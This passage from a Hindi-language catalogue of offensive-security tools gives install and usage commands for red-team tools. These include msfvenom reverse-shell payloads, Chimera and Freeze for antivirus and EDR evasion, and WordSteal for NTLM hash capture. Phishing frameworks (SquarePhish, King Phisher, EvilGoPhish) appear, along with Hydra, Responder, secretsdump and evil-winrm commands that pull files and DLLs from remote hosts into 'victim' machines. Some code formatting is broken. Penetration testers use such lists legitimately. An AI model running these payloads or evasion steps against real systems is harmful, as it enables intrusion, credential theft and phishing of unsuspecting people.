gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

चित्र https://www.uedbox.com/post/58828/ से लिया गया
Gowitness एक वेबसाइट स्क्रीनशॉट उपयोगिता है जो Golang में लिखी गई है, जो Chrome Headless का उपयोग करके कमांड लाइन के माध्यम से वेब इंटरफेस के स्क्रीनशॉट उत्पन्न करती है, और परिणामों को संसाधित करने के लिए एक सुविधाजनक रिपोर्ट व्यूअर के साथ आती है। Linux और macOS दोनों समर्थित हैं, Windows समर्थन अधिकतर काम करता है।
स्थापना: (Go)```bash go install github.com/sensepost/gowitness@latest
पूर्ण स्थापना जानकारी [यहाँ](https://github.com/sensepost/gowitness/wiki/Installation) पाई जा सकती है।
**उपयोग:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
पूर्ण उपयोग जानकारी यहाँ पाई जा सकती है।

छवि https://github.com/sensepost/gowitness से ली गई है
Chimera एक PowerShell अस्पष्टीकरण स्क्रिप्ट है जो AMSI और एंटीवायरस समाधानों को बायपास करने के लिए डिज़ाइन की गई है। यह AV को ट्रिगर करने के लिए ज्ञात दुर्भावनापूर्ण PS1's को डाइजेस्ट करती है और सामान्य डिटेक्शन सिग्नेचर से बचने के लिए स्ट्रिंग प्रतिस्थापन और चर सम्मिलन का उपयोग करती है।
स्थापना:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**उपयोग:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Msfvenom विभिन्न ऑपरेटिंग सिस्टमों के लिए कई प्रकार के फॉर्मेट में पेलोड बनाने की अनुमति देता है। यह AV बाईपास के लिए पेलोड के अस्पष्टीकरण का भी समर्थन करता है।
लिसनर सेट करें```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### Msfvenom कमांड्स
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
विंडोज़:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**लिनक्स:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellter एक गतिशील शेलकोड इंजेक्शन उपकरण है, और अब तक बनाया गया पहला वास्तविक गतिशील PE इन्फेक्टर है।
इसका उपयोग मूल विंडोज़ अनुप्रयोगों (वर्तमान में केवल 32-बिट अनुप्रयोग) में शेलकोड इंजेक्ट करने के लिए किया जा सकता है।
Shellter PE फ़ाइल की मूल संरचना का लाभ उठाता है और कोई भी संशोधन लागू नहीं करता जैसे कि अनुभागों में मेमोरी एक्सेस अनुमतियाँ बदलना (जब तक उपयोगकर्ता नहीं चाहता), RWE एक्सेस के साथ एक अतिरिक्त अनुभाग जोड़ना, और वह सब जो AV स्कैन के अंतर्गत संदिग्ध लगे।
पूर्ण README जानकारी यहाँ पाई जा सकती है।
स्थापना: (Kali)```bash apt-get update apt-get install shellter
**Install: (Windows)**
[डाउनलोड पृष्ठ](https://www.shellterproject.com/download/) पर जाएँ और स्थापित करें।
**उपयोग:**
बस एक वैध बाइनरी चुनें जिसमें बैकडोर डालना है और Shellter चलाएँ।
कुछ अच्छे टिप्स [यहाँ](https://www.shellterproject.com/tipstricks/) पाए जा सकते हैं।
समुदाय द्वारा बनाए गए कई उपयोग डेमो [यहाँ](https://www.shellterproject.com/shellter-community-demos/) मिल सकते हैं।

_https://www.kali.org/tools/shellter/images/shellter.png से ली गई छवि_
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freeze एक पेलोड निर्माण उपकरण है जिसका उपयोग EDR सुरक्षा नियंत्रणों को दरकिनार करके शेलकोड को गुप्त रूप से निष्पादित करने के लिए किया जाता है।
Freeze एकाधिक तकनीकों का उपयोग करता है, न केवल Userland EDR हुक्स को हटाने के लिए, बल्कि शेलकोड को इस तरह से निष्पादित करने के लिए भी कि वह अन्य एंडपॉइंट निगरानी नियंत्रणों को दरकिनार कर सके।
**स्थापना:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
उपयोग:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

_चित्र https://www.blackhatethicalhacking.com/tools/freeze/ से लिया गया है_
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
यह स्क्रिप्ट एक Microsoft Word दस्तावेज़ बनाएगी जिसमें एक रिमोट इमेज होगी, जो किसी रिमोट पीड़ित एंडपॉइंट से NTML हैश कैप्चर करने की अनुमति देगी।
Microsoft Word में रिमोट स्थानों से इमेज शामिल करने की क्षमता है, जिसमें एक हमलावर-नियंत्रित SMB सर्वर पर होस्ट की गई रिमोट इमेज भी शामिल है। यह आपको प्रमाणित पीड़ित द्वारा Word दस्तावेज़ खोलने और इमेज को रेंडर करने पर भेजे गए NTLM हैश को सुनने और कैप्चर करने का अवसर देता है।
**स्थापना:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
उपयोग:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

_चित्र https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/ से लिया गया_
---
### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)
यदि आप इस फ्रेमवर्क में उपयोग की गई तकनीकों के बारे में अधिक जानना चाहते हैं, तो कृपया SourceZero Blog और मूल टूल को देखें।
**विवरण:**
Freeze.rs एक पेलोड निर्माण उपकरण है जिसका उपयोग EDR सुरक्षा नियंत्रणों को दरकिनार करके शेलकोड को गुप्त रूप से निष्पादित करने के लिए किया जाता है। Freeze.rs कई तकनीकों का उपयोग करता है जो न केवल Userland EDR हुक्स को हटाती हैं, बल्कि शेलकोड को इस तरह से निष्पादित करती हैं कि यह अन्य एंडपॉइंट मॉनिटरिंग नियंत्रणों को भी दरकिनार कर देता है।
**एक सस्पेंडेड प्रक्रिया बनाना:**
जब एक प्रक्रिया बनाई जाती है, Ntdll.dll पहली DLL है जो लोड होती है; यह किसी भी EDR DLL के लोड होने से पहले होता है। इसका मतलब है कि EDR के लोड होने और सिस्टम DLLs की असेंबली को हुक और संशोधित करने में थोड़ी देरी होती है। Windows syscalls को Ntdll.dll में देखने पर, हम देख सकते हैं कि अभी तक कुछ भी हुक नहीं किया गया है। यदि हम एक प्रक्रिया को सस्पेंड स्थिति (समय में जमी हुई) में बनाते हैं, तो हम देख सकते हैं कि Ntdll.dll के अलावा कोई अन्य DLL लोड नहीं होती है। आप यह भी देख सकते हैं कि कोई EDR DLL लोड नहीं है, जिसका अर्थ है कि Ntdll.dll में स्थित syscalls अपरिवर्तित हैं।

**एड्रेस स्पेस लेआउट रैंडमाइजेशन**
इस साफ सस्पेंडेड प्रक्रिया का उपयोग Freeze.rs लोडर से हुक्स को हटाने के लिए करने हेतु, हमें प्रोग्रामेटिक रूप से साफ सस्पेंडेड प्रक्रिया की मेमोरी को खोजने और पढ़ने का एक तरीका चाहिए। यहीं पर एड्रेस स्पेस लेआउट रैंडमाइजेशन (ASLR) काम आता है। ASLR एक सुरक्षा तंत्र है जो स्टैक मेमोरी करप्शन-आधारित कमजोरियों को रोकता है। ASLR प्रक्रिया के अंदर एड्रेस स्पेस को रैंडमाइज़ करता है, ताकि सभी मेमोरी-मैप की गई वस्तुएं, स्टैक, हीप, और स्वयं निष्पादन योग्य प्रोग्राम अद्वितीय हों। अब, यहीं पर यह दिलचस्प हो जाता है क्योंकि जबकि ASLR काम करता है, यह पोजीशन-इंडिपेंडेंट कोड जैसे DLLs के लिए काम नहीं करता है। DLLs (विशेष रूप से ज्ञात सिस्टम DLLs) के साथ क्या होता है कि बूट समय पर एक बार एड्रेस स्पेस रैंडमाइज़ किया जाता है। इसका मतलब है कि हमें किसी रिमोट प्रक्रिया की जानकारी को गणना करने की आवश्यकता नहीं है ताकि उसके ntdll.dll का बेस एड्रेस खोज सकें, क्योंकि यह सभी प्रक्रियाओं में समान होता है, जिसमें वह प्रक्रिया भी शामिल है जिसे हम नियंत्रित करते हैं। चूंकि प्रत्येक DLL का पता प्रति बूट एक ही स्थान पर होता है, हम इस जानकारी को अपनी प्रक्रिया से प्राप्त कर सकते हैं और सस्पेंडेड प्रक्रिया से पता खोजने के लिए कभी भी गणना नहीं करनी पड़ती।

इस जानकारी के साथ, हम API ReadProcessMemory का उपयोग करके किसी प्रक्रिया की मेमोरी पढ़ सकते हैं। यह API कॉल आमतौर पर किसी भी क्रेडेंशियल-आधारित हमले के भाग के रूप में LSASS को पढ़ने से जुड़ा होता है; हालांकि, अपने आप में यह स्वाभाविक रूप से दुर्भावनापूर्ण नहीं है, खासकर यदि हम केवल मेमोरी का एक मनमाना भाग पढ़ रहे हैं। ReadProcessMemory को संदिग्ध के रूप में चिह्नित किए जाने का एकमात्र समय तब है जब आप कुछ ऐसा पढ़ रहे हैं जो आपको नहीं पढ़ना चाहिए (जैसे LSASS की सामग्री)। EDR उत्पादों को कभी भी ReadProcessMemory को कॉल किए जाने के तथ्य को चिह्नित नहीं करना चाहिए, क्योंकि इस फ़ंक्शन के वैध परिचालन उपयोग हैं और इससे कई झूठी सकारात्मकताएं उत्पन्न होंगी।
हम इसे एक कदम आगे ले जा सकते हैं केवल Ntdll.dll के उस भाग को पढ़कर जहां सभी syscalls संग्रहीत हैं - इसका .text सेक्शन, पूरी DLL को पढ़ने के बजाय।
इन तत्वों को संयोजित करके, हम शेलकोड निष्पादित करने से पहले अपने मौजूदा हुक किए गए .text सेक्शन को ओवरराइट करने के लिए Ntdll.dll के .text सेक्शन की एक प्रति प्रोग्रामेटिक रूप से प्राप्त कर सकते हैं।
**ETW पैचिंग**
ETW इस टेलीमेट्री को उत्पन्न करने के लिए बिल्ट-इन syscalls का उपयोग करता है। चूंकि ETW भी Windows में निर्मित एक मूल सुविधा है, सुरक्षा उत्पादों को जानकारी तक पहुंचने के लिए ETW syscalls को "हुक" करने की आवश्यकता नहीं है। परिणामस्वरूप, ETW को रोकने के लिए, Freeze.rs कई ETW syscalls को पैच करता है, रजिस्टरों को फ्लश करता है और निष्पादन प्रवाह को अगले निर्देश पर लौटाता है। ETW पैचिंग अब सभी लोडरों में डिफ़ॉल्ट है।
**शेलकोड**

Rust के NTAPI crate के साथ, आप देख सकते हैं कि ये सभी कॉल ntdll.dll के अंतर्गत दिखाई नहीं देते हैं, हालांकि वे प्रक्रिया के भीतर अभी भी मौजूद हैं।

परिणामस्वरूप:


**Rust क्यों?**
यह Rust सीखने के लिए एक मजेदार प्रोजेक्ट के रूप में शुरू हुआ और अपने स्वयं के फ्रेमवर्क में विकसित हो गया है।
**योगदान**
Freeze.rs Rust में विकसित किया गया था।
**स्थापना**
यदि Rust और Rustup स्थापित नहीं हैं तो कृपया उन्हें स्थापित करें। यदि आप इसे OSX या Linux से संकलित कर रहे हैं तो सुनिश्चित करें कि आपने लक्ष्य "x86_64-pc-windows-gnu" जोड़ा है। ऐसा करने के लिए निम्नलिखित कमांड चलाएं:
एक बार हो जाने पर आप Freeze.rs संकलित कर सकते हैं, निम्नलिखित कमांड चलाएं, या संकलित बाइनरी का उपयोग करें:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release
वहाँ से संकलित संस्करण target/release में में मिलेगा (ध्यान दें कि यदि आप --release नहीं डालते तो फ़ाइल target/debug/ में होगी )```bash
___________
_ /_ ____ ____ ________ ____ _______ ______
| ) _ __ _/ __ _/ __ \_ // __ \ _ __ / /
| \ | | /\ /\ / / /\ / | | /_
_ / || _ >_ >___ \___ > /\ |__| /____ >
/ / / / / / /
(@Tyl0us)
Soon they will learn that revenge is a dish... best served COLD & Rusty...
USAGE: Freeze-rs [FLAGS] [OPTIONS]
FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information
OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.
**बाइनरी बनाम DLL**
Freeze.rs एक .exe या .dll फ़ाइल जनरेट कर सकता है। यह निर्दिष्ट करने के लिए, सुनिश्चित करें कि -O कमांड-लाइन विकल्प बाइनरी के लिए .exe या DLL के लिए .dll के साथ समाप्त होता है। अन्य फ़ाइल प्रकार वर्तमान में समर्थित नहीं हैं। DLL फ़ाइलों के मामले में, Freeze.rs अतिरिक्त निर्यात कार्यक्षमता भी जोड़ सकता है। ऐसा करने के लिए विशिष्ट निर्यात फ़ंक्शन नाम के साथ -export का उपयोग करें।
**एन्क्रिप्शन**
शेलकोड को एन्क्रिप्ट करना एक महत्वपूर्ण तकनीक है जिसका उपयोग इसे EDRs और अन्य सुरक्षा उत्पादों द्वारा पहचाने और विश्लेषण किए जाने से बचाने के लिए किया जाता है। Freeze.rs शेलकोड को एन्क्रिप्ट करने के लिए कई विधियों के साथ आता है, इनमें AES, ELZMA, और RC4 शामिल हैं।
**AES**
AES (एडवांस्ड एन्क्रिप्शन स्टैंडर्ड) एक सममित एन्क्रिप्शन एल्गोरिद्म है जिसका व्यापक रूप से डेटा को एन्क्रिप्ट करने के लिए उपयोग किया जाता है। Freeze.rs शेलकोड को एन्क्रिप्ट करने के लिए AES-256 बिट आकार का उपयोग करता है। शेलकोड को एन्क्रिप्ट करने के लिए AES का उपयोग करने का लाभ यह है कि यह मजबूत एन्क्रिप्शन प्रदान करता है और क्रिप्टोग्राफिक लाइब्रेरीज़ द्वारा व्यापक रूप से समर्थित है। हालाँकि, एक निश्चित ब्लॉक आकार का उपयोग इसे कुछ हमलों, जैसे पैडिंग ऑरेकल अटैक, के प्रति संवेदनशील बना सकता है।
**ELZMA**
ELZMA एक संपीड़न और एन्क्रिप्शन एल्गोरिद्म है जिसका उपयोग अक्सर मैलवेयर में कोड को अस्पष्ट करने के लिए किया जाता है। ELZMA का उपयोग करके शेलकोड को एन्क्रिप्ट करने के लिए, शेलकोड को पहले ELZMA एल्गोरिद्म का उपयोग करके संपीड़ित किया जाता है। संपीड़ित डेटा को फिर एक रैंडम कुंजी का उपयोग करके एन्क्रिप्ट किया जाता है। एन्क्रिप्टेड डेटा और कुंजी को फिर एक्सप्लॉइट कोड में एम्बेड किया जाता है। ELZMA का उपयोग करके शेलकोड को एन्क्रिप्ट करने का लाभ यह है कि यह एक ही एल्गोरिद्म में संपीड़न और एन्क्रिप्शन दोनों प्रदान करता है। इससे एक्सप्लॉइट कोड के आकार को कम करने और इसे डिटेक्ट करना अधिक कठिन बनाने में मदद मिल सकती है।
**RC4**
RC4 एक सममित एन्क्रिप्शन एल्गोरिद्म है जिसका उपयोग अक्सर मैलवेयर में शेलकोड को एन्क्रिप्ट करने के लिए किया जाता है। यह एक स्ट्रीम सिफर है जो वेरिएबल-लेंथ कुंजियों का उपयोग कर सकता है और अपनी सरलता और गति के लिए जाना जाता है।
**कंसोल**
Freeze.rs पहले प्रक्रिया बनाने और फिर इसे बैकग्राउंड में ले जाने की एक तकनीक का उपयोग करता है। यह दो काम करता है - पहला, यह प्रक्रिया को छिपाए रखने में मदद करता है, और दूसरा, किसी भी EDR उत्पाद द्वारा पकड़े जाने से बचाता है। प्रक्रिया को तुरंत बैकग्राउंड में स्पॉन करना बहुत संदिग्ध और दुर्भावना का संकेत हो सकता है। Freeze.rs ऐसा प्रक्रिया बनने और EDR के हुक लोड होने के बाद 'GetConsoleWindow' और 'ShowWindow' विंडोज फ़ंक्शन को कॉल करके करता है, और फिर विंडो की विशेषताओं को हिडन में बदल देता है।
यदि -console कमांड-लाइन विकल्प चुना जाता है, तो Freeze.rs प्रक्रिया को बैकग्राउंड में नहीं छिपाएगा। इसके बजाय, Freeze.rs कई डीबग संदेश जोड़ेगा जो दर्शाते हैं कि लोडर क्या कर रहा है।
---
### [🔙](#tool-list)WSH
**पेलोड बनाना:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
निष्पादित करें:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**पेलोड बनाना:**```html
<html>
<body>
<script>
var c = "cmd.exe";
new ActiveXObject("WScript.Shell").Run(c);
</script>
</body>
</html>
निष्पादित करें: फ़ाइल चलाएं
पेलोड बनाना:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**निष्पादित करें:** मैक्रो सक्षम दस्तावेज़ में फ़ंक्शन को Auto_Open() पर सेट करें
# प्रारंभिक पहुंच
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunny एक भौतिक USB आक्रमण उपकरण और बहु-कार्य पेलोड वितरण प्रणाली है। इसे कंप्यूटर के USB पोर्ट में प्लग करने के लिए डिज़ाइन किया गया है और इसे विभिन्न कार्यों को करने के लिए प्रोग्राम किया जा सकता है, जिसमें डेटा में हेरफेर और बहिर्गमन, मैलवेयर स्थापित करना और सुरक्षा उपायों को बायपास करना शामिल है।
[hackinglab: Bash Bunny – गाइड](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[Hak5 दस्तावेज़ीकरण](https://docs.hak5.org/bash-bunny/)
[अच्छा पेलोड रिपॉजिटरी](https://github.com/hak5/bashbunny-payloads)
[उत्पाद पृष्ठ](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish. (GoPhish) Gophish एक शक्तिशाली, ओपन-सोर्स फ़िशिंग फ्रेमवर्क है जो आपके संगठन की फ़िशिंग के प्रति संवेदनशीलता का परीक्षण करना आसान बनाता है। (evilginx2) स्टैंडअलोन मैन-इन-द-मिडिल अटैक फ्रेमवर्क जिसका उपयोग लॉगिन क्रेडेंशियल्स के साथ-साथ सत्र कुकीज़ को फ़िश करने के लिए किया जाता है, जिससे 2-कारक प्रमाणीकरण को बायपास किया जा सकता है।
**स्थापित करें:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
उपयोग:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
यह फ्रेमवर्क प्रारंभिक पहुंच के लिए अभियान बनाने के लिए बहुत अच्छा है, 'SET में कई कस्टम अटैक वैक्टर हैं जो आपको जल्दी से एक विश्वसनीय हमला करने की अनुमति देते हैं'।
**स्थापित करें:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
उपयोग:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
लॉगिन ब्रूट फ़ोर्स हमलों के लिए अच्छा उपकरण। SSH, FTP, TELNET, HTTP आदि सहित कई सेवाओं पर ब्रूट फ़ोर्स कर सकता है।
**स्थापना:**```bash
sudo apt install hydra
उपयोग:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish एक उन्नत फ़िशिंग उपकरण है जो OAuth Device Code प्रमाणीकरण प्रवाह और QR कोड को संयोजित करने वाली तकनीक का उपयोग करता है (फ़िशिंग हमलों के लिए OAuth Device Code प्रवाह के बारे में अधिक जानने के लिए [PhishInSuits](https://github.com/secureworks/PhishInSuits) देखें)।
हमले के चरण:
- पीड़ित को दुर्भावनापूर्ण QR कोड भेजें
- पीड़ित मोबाइल डिवाइस से QR कोड स्कैन करता है
- पीड़ित हमलावर द्वारा नियंत्रित सर्वर पर निर्देशित होता है (OAuth Device Code प्रमाणीकरण प्रवाह प्रक्रिया शुरू होती है)
- पीड़ित को MFA कोड ईमेल किया जाता है (OAuth Device Code प्रवाह 15 मिनट का टाइमर शुरू होता है)
- हमलावर प्रमाणीकरण के लिए पोल करता है
- पीड़ित वैध Microsoft वेबसाइट पर कोड दर्ज करता है
- हमलावर प्रमाणीकरण टोकन सहेजता है
**स्थापना:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
नोट: किसी भी मॉड्यूल का उपयोग करने से पहले, settings.config फ़ाइल में Required के साथ चिह्नित आवश्यक जानकारी अपडेट करें।
उपयोग (ईमेल मॉड्यूल):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**उपयोग (सर्वर मॉड्यूल):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisher एक उपकरण है जो हमलावरों को पीड़ितों को संवेदनशील जानकारी प्राप्त करने के लिए फिशिंग ईमेल बनाने और भेजने की अनुमति देता है।
इसमें अनुकूलन योग्य टेम्पलेट्स, अभियान प्रबंधन, और ईमेल भेजने की क्षमताएं जैसी सुविधाएं शामिल हैं, जो इसे फिशिंग हमलों को अंजाम देने के लिए एक शक्तिशाली और उपयोग में आसान उपकरण बनाती हैं। King Phisher के साथ, हमलावर लक्षित और विश्वासपात्र फिशिंग ईमेल के साथ व्यक्तियों या संगठनों को लक्षित कर सकते हैं, जिससे उनके हमलों में सफलता की संभावना बढ़ जाती है।
इंस्टॉल (लिनक्स - क्लाइंट और सर्वर):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**उपयोग:**
King Phisher स्थापित होने के बाद कृपया SSH, डेटाबेस कॉन्फ़िग, SMTP सर्वर आदि सेटअप करने के लिए [wiki पेज](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) का पालन करें।

# निष्पादन
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responder एक उपकरण है जो नेटवर्क पर LLMNR और NBT-NS प्रोटोकॉल को पॉइज़निंग करने के लिए है, ताकि क्रेडेंशियल कैप्चर और मनमाना कोड निष्पादन संभव हो सके।
LLMNR (लिंक-लोकल मल्टीकास्ट नेम रिज़ॉल्यूशन) और NBT-NS (नेटबीआईओएस नेम सर्विस) प्रोटोकॉल विंडोज सिस्टम द्वारा स्थानीय नेटवर्क पर होस्टनामों को आईपी पतों में हल करने के लिए उपयोग किए जाते हैं। यदि इन प्रोटोकॉल का उपयोग करके होस्टनाम हल नहीं किया जा सकता है, तो सिस्टम स्थानीय नेटवर्क पर होस्टनाम के लिए एक प्रसारण अनुरोध भेजेगा।
Responder इन प्रसारणों को सुनता है और एक नकली आईपी पते के साथ प्रतिक्रिया देता है, अनुरोध करने वाले सिस्टम को धोखा देकर अपने क्रेडेंशियल हमलावर को भेजने के लिए प्रेरित करता है।
**स्थापना:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
उपयोग:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
पूर्ण उपयोग जानकारी [यहाँ](https://github.com/SpiderLabs/Responder#usage) पाई जा सकती है।

_चित्र https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ से लिया गया है_
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
यह उपयोगिता Impacket लाइब्रेरी का भाग है जिसका उपयोग विंडोज सिस्टम से पासवर्ड हैश और अन्य गुप्त जानकारी निकालने के लिए किया जा सकता है।
यह सिस्टम पर Security Account Manager (SAM) डेटाबेस के साथ इंटरैक्ट करके हैश किए गए पासवर्ड और अन्य जानकारी निकालता है, जैसे:
- स्थानीय खातों के लिए पासवर्ड हैश
- Kerberos टिकट और कुंजियाँ
- LSA Secrets
**स्थापना:**```bash
python3 -m pip install impacket
उपयोग:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

_से ली गई छवि https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM एक उपकरण है जो विंडोज रिमोट मैनेजमेंट (WinRM: _एक सेवा जो प्रशासकों को विंडोज मशीन पर दूरस्थ रूप से कमांड निष्पादित करने की अनुमति देती है_) के लिए एक कमांड लाइन इंटरफ़ेस प्रदान करता है।
Evil-WinRM एक आक्रमणकारी को WinRM का उपयोग करके विंडोज मशीन से दूरस्थ रूप से कनेक्ट करने और मनमाने आदेशों को निष्पादित करने की अनुमति देता है।
कुछ विशेषताओं में शामिल हैं:
- मेमोरी में पॉवरशेल स्क्रिप्ट लोड करना
- कुछ AV को बायपास करते हुए मेमोरी में dll फ़ाइलें लोड करना
- x64 पेलोड लोड करना
- पास-द-हैश समर्थन
- स्थानीय और दूरस्थ फ़ाइलों को अपलोड और डाउनलोड करना
**स्थापना: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
इंस्टॉल करें: (Ruby gem)```bash gem install evil-winrm
वैकल्पिक इंस्टॉलेशन निर्देश [यहाँ](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods) पाए जा सकते हैं।
**उपयोग:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
पूर्ण उपयोग दस्तावेज़ीकरण यहाँ पाया जा सकता है here.

चित्र का उपयोग किया गया है https://korbinian-spielvogel.de/posts/heist-writeup/ से
VBScript, JScript, EXE, DLL फ़ाइलों और dotNET असेंबलियों के मेमोरी में निष्पादन के लिए एक उपकरण। इसका उपयोग लक्ष्य प्रणालियों पर डिस्क पर फ़ाइलें ड्रॉप करने की आवश्यकता के बिना कस्टम पेलोड लोड और चलाने के लिए किया जा सकता है।
स्थापना: (Windows)```bash git clone http://github.com/thewover/donut.git
लोडर टेम्पलेट, डायनेमिक लाइब्रेरी donut.dll, स्टैटिक लाइब्रेरी donut.lib और जनरेटर donut.exe उत्पन्न करने के लिए। एक x64 Microsoft Visual Studio Developer Command Prompt प्रारंभ करें, उस निर्देशिका में बदलें जहां आपने Donut रिपॉजिटरी को क्लोन किया है और निम्नलिखित दर्ज करें:```bash
nmake -f Makefile.msvc
ऐसा ही करने के लिए, Windows या Linux पर MinGW-64 का उपयोग करते हुए, उस निर्देशिका में जाएँ जहाँ आपने Donut रिपॉजिटरी को क्लोन किया है और निम्नलिखित दर्ज करें:```bash make -f Makefile.mingw
**स्थापित करें: (Linux)**```bash
pip3 install donut-shellcode
उपयोग:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
पूर्ण उपयोग जानकारी के लिए, donut का [GitHub Page](https://github.com/TheWover/donut/#4-usage) देखें।
अधिक जानकारी के लिए The Wover का [हालिया ब्लॉग पोस्ट](https://thewover.github.io/Bear-Claw/) देखें।

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
